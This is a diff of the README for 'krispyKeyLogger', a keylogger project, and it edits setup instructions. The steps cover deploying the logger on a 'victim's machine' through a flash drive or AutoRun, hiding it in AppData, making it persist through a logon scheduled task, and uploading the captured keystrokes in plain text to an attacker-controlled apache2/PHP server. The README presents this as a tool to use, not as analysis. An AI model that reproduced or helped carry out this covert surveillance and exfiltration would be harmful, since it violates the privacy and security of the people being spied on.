zxcV32/krispyKeyLogger/README.md

 2) pyHook-1.5.1-cp37-cp37m-win64.whl
 3) pywin32-223.1-cp37-cp37m-win64.whl
 4) Internet connection on victim's machine (for uploading logs-optional)
-5) A web host running apach2 on the internet (to download logs from victim's machine)
+5) A web host running apache2 on the internet (to download logs from victim's machine).

 # Steps to setup krispyKeyLogger on victim's machine
-1) download this repo and also download python-3.7.0-amd64.exe from https://www.python.org/downloads/ and save it to victim directory
+1) Download this repo and also download python-3.7.0-amd64.exe from https://www.python.org/downloads/ and save it to victim directory
-2) you can carry victim directory in a removeable flash drive or download from web.
+2) You can carry victim directory in a removeable flash drive or download from web.
-3) change remote server path where you want to upload logs (optinal).You can also change the path where the python script will be stored,then you need to also change python script location on task schedule command.
+3) Change remote server path where you want to upload logs in init2z.pyw (optinal if you want logs to be upload).You can also change the path where the python script 'init2z.pyw' will be stored in 'deploy.bat' script,then you need to also change location of 'init2z.pyw' python script on task schedule command in 'deploy.bat'.Default path for 'init2z.pyw' is 'C:\Users\%USERNAME%\AppData\Local\init2z.pyw' where admin write permission is not required.
-4) execute hiddencmd.bat either by AutoRun or manually you will be requied to give administrative privileges to make a windows task schedule to execute krispyKeyLogger at logon,if privileges are not given the task will not be created.
+4) Execute hiddencmd.bat either by AutoRun or manually.
+  You will be requied to give administrative privileges to make a windows task schedule to execute krispyKeyLogger at logon,if privileges are not given the task will not be created however the 'init2z.pyw' can be manually executed.
-5) the deploy.bat fill will isntall python and two other python packages present in this directory.
+5) The 'deploy.bat' file will install python and two other python packages present in this directory.
-6) deploy.bat will also create an instance of krispyKeyLogger for current session.
+6) 'deploy.bat' will also create an instance of krispyKeyLogger for current user login session.

 # Steps to setup krispyKeyLogger on server - remote access logs (optional)
-1) download server side directory to an apache2 server make sure that you can execute the php from a domain or ip address eg. http://example.com/upload.php or http://127.0.0.1/upload.php
+1) Download server side directory to an apache2 server.
+Make sure that you can execute the php from a domain or ip address eg. http://example.com/upload.php or http://127.0.0.1/upload.php
-2) change "Krispy_logs" directory location or create a directory any where you want.just make sure you have write permission on that directory.default location is "/home/user/Krispy_logs/" where 'user' is the username for current user.change it accordingly on debian based system.
+2) change "Krispy_logs" directory location or create a directory anywhere you want.just make sure you have write permission on that directory.Default location is "/home/user/Krispy_logs/" where 'user' is the username for current user.Change it accordingly on debian based system or enter a completely new location.

 # known bugs and other hints
-1) reinstalls python on default directory.untested on different environments.tested on fresh install of windows.
+1) Reinstalls python on default directory.untested on different environments having custom installation of python.Tested on fresh install of windows.
 2) logs and init2z.pyw are saved in plain text.
 3) logs are sent over the internet in plain text without SSL.
 4) sometimes windows task scheduler do not starts the task on logon